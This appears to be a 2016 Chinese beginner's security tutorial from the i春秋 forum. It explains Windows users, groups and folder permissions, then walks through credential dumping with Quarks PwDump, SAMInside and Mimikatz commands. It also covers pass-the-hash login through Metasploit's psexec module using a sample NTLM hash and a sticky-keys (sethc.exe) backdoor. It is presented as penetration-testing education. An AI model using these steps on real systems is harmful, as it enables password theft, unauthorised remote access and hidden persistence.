来源：http://bbs.ichunqiu.com/thread-8826-1-1.html?from=ch

作者：zusheng

时间：2016年7月28日11:17:37

社区：i春秋

前言

本篇是基础教程，带大家了解Windows常用用户及用户组，本地提取用户密码，远程利用Hash登录到本地破解Hash。初步掌握Windows基础安全知识。

目录

第一节 初识Windows

第二节 Windows密码安全

第三节 利用Hash远程登录系统

正文

第一节 初识Windows

1.1、什么是Window

Microsoft Windows,是美国微软公司研发的一套操作系统，它问世于1985年，起初仅仅是Microsoft-DOS模拟环境，后续的系统版本由于微软不断的更新升级，不但易用，也慢慢的成为家家户户人们最喜爱的操作系统。Windows采用了图形化模式GUI，比起从前的DOS需要键入指令使用的方式更为人性化。随着电脑硬件和软件的不断升级，微软的Windows也在不断升级，从架构的16位、32位再到64位， 系统版本从最初的Windows 1.0 到大家熟知的Windows 95、Windows 98、Windows ME、Windows 2000、Windows 2003、Windows XP、Windows Vista、Windows 7、Windows 8、Windows 8.1、Windows 10 和 Windows Server服务器企业级操作系统。

1.2、Windows常用用户

SYSTEM：本地机器上拥有最高权限的用户。

Administrator：本地机器上拥有最高权限的用户。

Guest：只拥有相对较少的权限，默认被禁用。

1.3、Windows常见用户组

Administrators,管理员组，默认情况下，Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以，只有受信任的人员才可成为该组的成员。

Power Users，高级用户组，Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中，这个组的权限是仅次于Administrators的。

Users:普通用户组，这个组的用户无法进行有意或无意的改动。因此，用户可以运行经过验证的应用程序，但不可以运行大多数旧版应用程序。Users 组是最安全的组，因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上，默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站，但不能关闭服务器。Users 可以创建本地组，但只能修改自己创建的本地组。

Guests:来宾组，按默认值，来宾跟普通Users的成员有同等访问权，但来宾帐户的限制更多。

Everyone:顾名思义，所有的用户，这个计算机上的所有用户都属于这个组。

1.4、Windows文件夹权限

①完全控制（Full Control）：

该权限允许用户对文件夹、子文件夹、文件进行全权控制，如修改资源的权限、获取资源的所有者、删除资源的权限等，拥有完全控制权限就等于拥有了其他所有的权限；

②修改（Modify）：

该权限允许用户修改或删除资源，同时让用户拥有写入及读取和运行权限；

③读取和运行（Read & Execute）：

该权限允许用户拥有读取和列出资源目录的权限，另外也允许用户在资源中进行移动和遍历，这使得用户能够直接访问子文件夹与文件，即使用户没有权限访问这个路径；

④列出文件夹目录（List Folder Contents）：

该权限允许用户查看资源中的子文件夹与文件名称；

⑤读取（Read）：

该权限允许用户查看该文件夹中的文件以及子文件夹，也允许查看该文件夹的属性、所有者和拥有的权限等；

⑥写入（Write）：

该权限允许用户在该文件夹中创建新的文件和子文件夹，也可以改变文件夹的属性、查看文件夹的所有者和权限等。

第二节 Windows密码安全

工具一、Quarks PwDump

Quarks PwDump 是一个Win32环境下的系统授权信息导出工具，目前除此之外没有任何一款工具可以导出如此全面的信息，支持这么多的OS版本，且相当稳定。它目前可以导出 :- Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录 – Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录 – Cached domain password 缓存中的域管理密码 – Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢复后遗留的信息支持的操作系统 : XP/2003/Vista/7/2008/81 / USAGE

使用说明：

[Bash shell]纯文本查看复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12quarks-pwdump.exe

Options :

-dhl  --dump-hash-local

-dhdc --dump-hash-domain-cached

-dhd  --dump-hash-domain (NTDS_FILE must be specified)

-db   --dump-bitlocker (NTDS_FILE must be specified)

-nt   --ntds-fileFILE

-hist --with-history(optional)

-t    --output-typeJOHN/LC(optional,ifno=>JOHN)

-o    --output FILE (optional,ifno=>stdout)

Example: quarks-pwdump.exe --dump-hash-domain --with-history

工具二、SAMInside

SAMInside为一款俄罗斯出品的Windows密码恢复软件，支持Windows NT/2000/XP/Vista操作系统，主要用来恢复Windows的用户登录密码。

使用说明：

导入本地系统和文件，当然，也可以从项目文件、文件导入，注意SAM文件是系统的SAM文件，一般在C:\WINDOWS\system32\config路径下，看下图：

按快捷键“F4”，视密码复杂程度、密码长度和机器性能，有时很快就等到结果，如果时间过长，还可以暂停，保存破解状态留待下次接着运行。

工具三、Mimikatz

大神们都知道的东西吧，渗透测试常用工具。法国一个牛B的人写的轻量级调试器，可以帮助安全测试人员抓取Windows密码。

使用说明：

[Bash shell]纯文本查看复制代码

?

1

2

3

4第一条：privilege::debug

//提升权限

第二条：sekurlsa::logonpasswords

//抓取密码

首先你需要知道自己操作系统的位数

右键我的电脑属性

如果您的电脑是64位，则会明确标明“x64”，如果没有标明则说明您的电脑是32位的。

第三节 利用Hash远程登录系统

第二节我们获取到的Hash：

[AppleScript]纯文本查看复制代码

?

1

44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4

打开Metasploit

[Bash shell]纯文本查看复制代码

?

1

use exploit/windows/smb/psexec//没办法，请去掉中间空格，在一起会被屏蔽

设置一下攻击参数

设置Payload

无法利用怎么办？

本地暴力破解Hash

本地软件下载彩虹表进行暴力破解我这里就不讲解了。

给大家一个在线破解的网站，方便快捷。

http://www.objectif-securite.ch/ophcrack.php

小技巧：Windows2003-Shift后门

Shift后门制作

sethc.exe就是Windows的粘滞键，我们备份一下。

将cmd.exe改成sethc.exe

在用户登录界面连按五次shift